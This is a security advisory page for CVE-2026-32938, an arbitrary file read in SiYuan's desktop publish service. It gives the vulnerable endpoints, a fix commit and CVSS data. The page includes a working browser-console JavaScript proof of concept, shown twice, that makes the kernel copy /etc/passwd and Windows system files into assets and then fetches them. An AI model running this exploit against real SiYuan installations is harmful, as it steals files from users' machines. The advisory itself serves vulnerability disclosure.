GHSA-FQ2J-J8HC-8VW8

Vulnerability from github – Published: 2026-03-17 14:07 – Updated: 2026-03-30 14:02
VLAI?
Summary
SiYuan Vulnerable to Arbitrary File Read in Desktop Publish Service
Details

Summary

In SiYuan, /api/lute/html2BlockDOM on the desktop copies local files pointed to by file:// links in pasted HTML into the workspace assets directory without validating paths against a sensitive-path list. Together with GET /assets/*path, which only requires authentication, a publish-service visitor can cause the desktop kernel to copy any readable sensitive file and then read it via GET, leading to exfiltration of sensitive files.

Details

1. Arbitrary local files copied into workspace

  • Endpoint: POST /api/lute/html2BlockDOM, protected only by model.CheckAuth; publish read-only role is not restricted.
  • Behavior: On desktop (util.ContainerStd == model.Conf.System.Container), local absolute paths from <a href="file://..."> in the HTML are copied to {DataDir}/assets/.
  • Missing check: The code does not call util.IsSensitivePath(localPath) before copying, so any readable file (e.g. /etc/passwd, ~/.ssh/id_rsa) can be copied into assets.

2. Direct access to assets via GET

  • Endpoint: GET /assets/*path (kernel/server/serve.go), protected only by model.CheckAuth; no publish-scope or admin check.
  • Behavior: The path is resolved with model.GetAssetAbsPath("assets" + path) and the file is served with http.ServeFile; any authenticated request (including publish visitors) can access existing asset files.
  • Attack chain: The visitor calls html2BlockDOM to copy a sensitive file into data/assets/, extracts data-href="assets/xxx" from the returned DOM, then requests GET /assets/xxx to retrieve the file content.

PoC

// Run in the browser devtools console while on the SiYuan publish service
(async () => {
  try {
    // Paths below fall under util.IsSensitivePath prefixes (/etc, c:\windows\system32)
    const sensitiveFiles = [
      'file:///etc/passwd',
      'file:///etc/group',
      'file:///C:/Windows/System32/drivers/etc/hosts',
      'file:///C:/Windows/System32/drivers/etc/services',
    ];
    const dom = '<p>' + sensitiveFiles.map(f => `<a href="${f}">x</a>`).join(' ') + '</p>';
    const r1 = await fetch('/api/lute/html2BlockDOM', {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({ dom }),
      credentials: 'same-origin',
    });
    const { data } = await r1.json();
    const paths = [...(data || '').matchAll(/data-href="(assets\/[^"]+)"/g)].map(m => m[1]);
    for (const p of paths) {
      const r2 = await fetch('/' + p, { credentials: 'same-origin' });
      if (r2.ok) console.log('--- ' + p + ' ---\n' + (await r2.text()));
    }
  } catch (_) {}
})();

Impact

With only normal authentication, an attacker can bypass intended directory restrictions and read any sensitive file that the process can read on the desktop user’s machine (e.g. system account data, network configuration, credential configs), compromising confidentiality of sensitive data and the runtime environment.

Severity ?
9.9 (Critical)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siyuan-note/siyuan/kernel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.0.0-20260313024916-fd6526133bb3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-32938"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-22",
      "CWE-284"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-17T14:07:57Z",
    "nvd_published_at": "2026-03-20T04:16:48Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nIn SiYuan, `/api/lute/html2BlockDOM` on the desktop copies local files pointed to by `file://` links in pasted HTML into the workspace assets directory without validating paths against a sensitive-path list. Together with `GET /assets/*path`, which only requires authentication, a publish-service visitor can cause the desktop kernel to copy any readable sensitive file and then read it via GET, leading to exfiltration of sensitive files.\n\n### Details\n\n#### 1. Arbitrary local files copied into workspace\n\n- **Endpoint**: `POST /api/lute/html2BlockDOM`, protected only by `model.CheckAuth`; publish read-only role is not restricted.\n- **Behavior**: On desktop (`util.ContainerStd == model.Conf.System.Container`), local absolute paths from `\u003ca href=\"file://...\"\u003e` in the HTML are copied to `{DataDir}/assets/`.\n- **Missing check**: The code does not call `util.IsSensitivePath(localPath)` before copying, so any readable file (e.g. `/etc/passwd`, `~/.ssh/id_rsa`) can be copied into assets.\n\n#### 2. Direct access to assets via GET\n\n- **Endpoint**: `GET /assets/*path` (`kernel/server/serve.go`), protected only by `model.CheckAuth`; no publish-scope or admin check.\n- **Behavior**: The path is resolved with `model.GetAssetAbsPath(\"assets\" + path)` and the file is served with `http.ServeFile`; any authenticated request (including publish visitors) can access existing asset files.\n- **Attack chain**: The visitor calls html2BlockDOM to copy a sensitive file into `data/assets/`, extracts `data-href=\"assets/xxx\"` from the returned DOM, then requests `GET /assets/xxx` to retrieve the file content.\n\n### PoC\n\n```javascript\n// Run in the browser devtools console while on the SiYuan publish service\n(async () =\u003e {\n  try {\n    // Paths below fall under util.IsSensitivePath prefixes (/etc, c:\\windows\\system32)\n    const sensitiveFiles = [\n      \u0027file:///etc/passwd\u0027,\n      \u0027file:///etc/group\u0027,\n      \u0027file:///C:/Windows/System32/drivers/etc/hosts\u0027,\n      \u0027file:///C:/Windows/System32/drivers/etc/services\u0027,\n    ];\n    const dom = \u0027\u003cp\u003e\u0027 + sensitiveFiles.map(f =\u003e `\u003ca href=\"${f}\"\u003ex\u003c/a\u003e`).join(\u0027 \u0027) + \u0027\u003c/p\u003e\u0027;\n    const r1 = await fetch(\u0027/api/lute/html2BlockDOM\u0027, {\n      method: \u0027POST\u0027,\n      headers: { \u0027Content-Type\u0027: \u0027application/json\u0027 },\n      body: JSON.stringify({ dom }),\n      credentials: \u0027same-origin\u0027,\n    });\n    const { data } = await r1.json();\n    const paths = [...(data || \u0027\u0027).matchAll(/data-href=\"(assets\\/[^\"]+)\"/g)].map(m =\u003e m[1]);\n    for (const p of paths) {\n      const r2 = await fetch(\u0027/\u0027 + p, { credentials: \u0027same-origin\u0027 });\n      if (r2.ok) console.log(\u0027--- \u0027 + p + \u0027 ---\\n\u0027 + (await r2.text()));\n    }\n  } catch (_) {}\n})();\n```\n\n### Impact\n\nWith only normal authentication, an attacker can bypass intended directory restrictions and read any sensitive file that the process can read on the desktop user\u2019s machine (e.g. system account data, network configuration, credential configs), compromising confidentiality of sensitive data and the runtime environment.",
  "id": "GHSA-fq2j-j8hc-8vw8",
  "modified": "2026-03-30T14:02:48Z",
  "published": "2026-03-17T14:07:57Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-fq2j-j8hc-8vw8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32938"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/commit/294b8b429dea152cd1df522cddf406054c1619ad"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/siyuan-note/siyuan"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/releases/tag/v3.6.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SiYuan Vulnerable to Arbitrary File Read in Desktop Publish Service"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.